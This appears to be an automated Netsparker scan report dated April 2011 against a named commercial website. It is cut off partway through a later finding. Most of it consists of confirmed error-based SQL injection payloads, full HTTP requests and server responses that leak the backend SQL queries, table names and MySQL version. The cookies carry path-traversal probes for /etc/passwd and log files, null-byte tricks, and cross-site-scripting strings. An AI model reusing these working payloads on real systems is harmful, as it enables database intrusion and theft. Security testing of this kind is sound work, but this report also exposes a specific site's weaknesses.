'leadflow/inco00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Parameters

Parameter Type Value
catId GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
iusrc GET iupsc

Extracted Data

5.0.45

Request

GET /ppc/leadflow/bulo00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mdu7f547n6tf7da5n81d2luvh2; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=unct3s9hs5novtpifms5a4nlq4; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B(select+1+and+row(1%2..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 